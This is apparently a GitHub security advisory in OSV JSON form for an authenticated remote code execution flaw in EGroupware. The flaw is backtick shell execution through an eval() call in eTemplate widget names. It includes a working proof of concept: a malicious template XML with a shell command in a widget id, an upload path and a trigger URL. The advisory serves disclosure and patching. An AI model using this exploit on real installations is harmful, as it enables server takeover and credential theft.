{"id":"GHSA-8737-2x9g-xjj7","summary":"EGroupware has Authenticated RCE via Malicious eTemplate Upload","details":"## Summary\n\nAn authenticated administrator can achieve OS-level Remote Code Execution (RCE) by uploading a malicious eTemplate XML file (`.xet`) to the VFS `/etemplates` mount.\n\nThe `Widget::expand_name()` method passes template widget attribute values directly into a PHP `eval()` call with only double-quote escaping applied - **backtick characters are not escaped**.\n\nIn PHP, backticks inside a double-quoted `eval()` string execute shell commands. This allows an admin-level user to escalate from web\napplication access to arbitrary OS command execution on the server.\n\n------------------------------------------------------------------------\n\n## Details\n\nThe vulnerability is located in `api/src/Etemplate/Widget.php`, `Widget::expand_name()`:  (lines 703–728)\n\nThe method is designed to expand PHP variables (e.g., `$row`, `$col`,`$cont[id]`) in widget attribute values for auto-repeat grids. The `eval()` is triggered whenever `$name` contains a `$` character (line 706). The only sanitization applied before the eval is:\n\n``` php\nstr_replace('\"', '\\\\\"', $name)\n```\n\nThis escapes double quotes only. **Backtick characters are not escaped**. In PHP, backticks inside a double-quoted string in `eval()` are treated as shell execution operators — equivalent to  `shell_exec()`. A widget `id` of `$row\\`id`` produces:\n\n```\neval('$name = \"$row`id`\";');  // executes shell command: id\n```\n\n`expand_name()` is called from:\n\n-   `form_name()`\n-   `expand_widget()`\n-   `set_attrs()`\n-   `Template::run()`\n\nThe `/etemplates` VFS path is created exclusively for admin users — it is `chgrp`'d to `Admins` and `chmod`'d to `075` (Admins group has full rwx): class.filemanager_admin.inc.php:95-106\n\nCustom templates in `/etemplates` take precedence over built-in filesystem templates, meaning a malicious template can silently override any existing application template.\n\n\n**Mitigating factor**: The official Docker deployment sets `disable_functions = exec,passthru,shell_exec,system,proc_open,popen` in `php.ini`, which also blocks PHP backtick execution (backticks internally call shell_exec). Non-Docker or non-hardened deployments without this `php.ini` setting are fully vulnerable. Dockerfile:47\n\nThe current master branch in api/setup/setup.inc.php, confirming the vulnerability is present in the latest code as of today. setup.inc.php:14-17\n\n\n------------------------------------------------------------------------\n\n## Proof of Concept (PoC)\n\n### Prerequisites\n\n-   Admin account\n-   Non-Docker deployment, or Docker deployment where disable_functions has been removed/modified in php.ini\n\n\n### Step 1 — Mount /etemplates:\nLog in as admin, navigate to Admin → Filemanager → VFS Mounts, and click \"Install custom templates\". This executes the code in `filemanager_admin.inc.php` that mounts `/etemplates` with Admins-group write access.\n\n### Step 2 — Upload malicious template:\n\nCreate a file named `index.xet` with the following content:\n\n``` xml\n\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\n\u003coverlay\u003e\n  \u003ctemplate id=\"admin.index\"\u003e\n    \u003cgrid\u003e\n      \u003ccolumns\u003e\u003ccolumn/\u003e\u003c/columns\u003e\n      \u003crows\u003e\n        \u003crow\u003e\n          \u003ctextbox id=\"$row`touch /tmp/pwned_egw 2\u003e/dev/null`\"/\u003e\n        \u003c/row\u003e\n      \u003c/rows\u003e\n    \u003c/grid\u003e\n  \u003c/template\u003e\n\u003c/overlay\u003e\n```\nUpload this file to `/etemplates/admin/templates/default/index.xet` via the VFS filemanager.\n\n\n### Step 3 — Trigger execution:\nNavigate to the EGroupware admin panel:\n```\nhttps://\u003ctarget\u003e/egroupware/index.php?menuaction=admin.admin_ui.index  \n```\nWhen the template is loaded and beforeSendToClient() runs, form_name() calls expand_name() with $name = '$row\\touch /tmp/pwned_egw 2\u003e/dev/null`'and$row = 0`. The eval becomes:\n```\neval('$name = \"$row`touch /tmp/pwned_egw 2\u003e/dev/null`\";');\n\n```\n\nPHP executes the backtick expression as a shell command.\n\n### Step 4 — Verify:\nCheck that `/tmp/pwned_egw` was created on the server. For a more impactful demonstration, replace `touch /tmp/pwned_egw` with `id \u003e /tmp/pwned_egw` to capture the web server's OS user identity.\n\n\n\n------------------------------------------------------------------------\n\n## Impact\n\nAuthenticated Remote Code Execution (RCE) via eval() with unsanitized shell metacharacters.\n\nWho is impacted: Any EGroupware installation where:\n\n1. An admin account is compromised or a malicious admin exists, AND\n2. The server is not running with disable_functions blocking shell_exec (i.e., non-Docker or misconfigured deployments)\n\n------------------------------------------------------------------------\n\n## Severity\n\nThe vulnerability allows escalation from EGroupware admin-level web access to arbitrary OS command execution as the web server user (typically www-data). From there, an attacker can read configuration files (including database credentials), pivot to other services, or establish persistence. This is not exploitable by regular (non-admin) users. The official Docker deployment is not affected due to disable_functions, but bare-metal, VM, or custom container deployments without this hardening are fully vulnerable.","aliases":["CVE-2026-40187"],"modified":"2026-07-07T13:26:41.027904Z","published":"2026-07-07T13:01:31Z","database_specific":{"nvd_published_at":null,"cwe_ids":["CWE-78","CWE-95"],"severity":"HIGH","github_reviewed":true,"github_reviewed_at":"2026-07-07T13:01:31Z"},"references":[{"type":"WEB","url":"https://github.com/EGroupware/egroupware/security/advisories/GHSA-8737-2x9g-xjj7"},{"type":"PACKAGE","url":"https://github.com/EGroupware/egroupware"}],"affected":[{"package":{"name":"egroupware/egroupware","ecosystem":"Packagist","purl":"pkg:composer/egroupware/egroupware"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"26.0.20251208"},{"fixed":"26.4.20260413"}]}],"versions":["26.0.20251208","26.0.20251216","26.0.20260108","26.0.20260113","26.0.20260123","26.1.20260130","26.2.20260203","26.2.20260207","26.2.20260209","26.2.20260216","26.2.20260224","26.3.20260316","26.4.20260408"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/07/GHSA-8737-2x9g-xjj7/GHSA-8737-2x9g-xjj7.json","last_known_affected_version_range":"\u003c 26.0.20260113"}},{"package":{"name":"egroupware/egroupware","ecosystem":"Packagist","purl":"pkg:composer/egroupware/egroupware"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"23.1.20260601"}]}],"versions":["14.2.20150121","14.2.20150206","14.2.20150210","14.2.20150212","14.2.20150218","14.2.20150310","14.2.20150402","14.2.20150421","14.2.20150428","14.2.20150429","14.2.20150501","14.2.20150603","14.2.20150707","14.2.20150717","14.3.20150728","14.3.20150729","14.3.20150811","14.3.20150821","14.3.20150826","14.3.20150908","14.3.20151012","14.3.20151027","14.3.20151028","14.3.20151029","14.3.20151030","14.3.20151110","14.3.20151130","14.3.20151201","14.3.20160112","14.3.20160113","14.3.20160304","14.3.20160428","14.3.20160512","14.3.20160522","14.3.20160524","14.3.20160525","14.3.20160708","16.1.20160603","16.1.20160621","16.1.20160627","16.1.20160630","16.1.20160708","16.1.20160715","16.1.20160801","16.1.20160810","16.1.20160905","16.1.20161006","16.1.20161102","16.1.20161107","16.1.20161208","16.1.20170118","16.1.20170203","16.1.20170315","16.1.20170415","16.1.20170612","16.1.20170613","16.1.20170703","16.1.20170922","16.1.20171106","16.1.20180116","16.1.20180130","17.1.20171023","17.1.20171106","17.1.20171115","17.1.20171129","17.1.20171130","17.1.20171218","17.1.20180118","17.1.20180130","17.1.20180209","17.1.20180321","17.1.20180413","17.1.20180523","17.1.20180625","17.1.20180720","17.1.20180831","17.1.20181018","17.1.20181204","17.1.20181205","17.1.20190111","17.1.20190214","17.1.20190222","17.1.20190402","17.1.20190529","17.1.20190808","19.1.20190716","19.1.20190717","19.1.20190726","19.1.20190806","19.1.20190813","19.1.20190822","19.1.20190917","19.1.20190925","19.1.20191031","19.1.20191119","19.1.20191220","19.1.20200130","19.1.20200318","19.1.20200409","19.1.20200430","19.1.20200605","19.1.20200701","20.1.20200525","20.1.20200613","20.1.20200628","20.1.20200710","20.1.20200716","20.1.20200728","20.1.20200731","20.1.20200810","20.1.20200812","20.1.20200818","20.1.20200901","20.1.20200914","20.1.20201005","20.1.20201020","20.1.20201028","20.1.20201202","20.1.20201217","20.1.20210125","20.1.20210324","20.1.20210503","21.1.20210318","21.1.20210329","21.1.20210406","21.1.20210420","21.1.20210504","21.1.20210521","21.1.20210629","21.1.20210723","21.1.20210923","21.1.20211130","21.1.20220207","21.1.20220406","21.1.20220408","21.1.20220905","21.1.20220916","21.1.20221202","21.1.20230210","22.1.20220920","23.1.20230110","23.1.20230114","23.1.20230125","23.1.20230210","23.1.20230228","23.1.20230314","23.1.20230328","23.1.20230412","23.1.20230428","23.1.20230503","23.1.20230524","23.1.20230620","23.1.20230726","23.1.20230728","23.1.20230824","23.1.20230911","23.1.20231110","23.1.20231122","23.1.20231129","23.1.20231201","23.1.20231219","23.1.20231220","23.1.20240125","23.1.20240304","23.1.20240430","23.1.20240624","23.1.20240905","23.1.20240930","23.1.20241008","23.1.20241111","23.1.20241128","23.1.20241214","23.1.20250113","23.1.20250307","23.1.20250416","23.1.20250506","23.1.20250715","23.1.20250902","23.1.20251021","23.1.20251119","23.1.20251222","23.1.20260108","23.1.20260113","23.1.20260131","23.1.20260224"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/07/GHSA-8737-2x9g-xjj7/GHSA-8737-2x9g-xjj7.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"}]}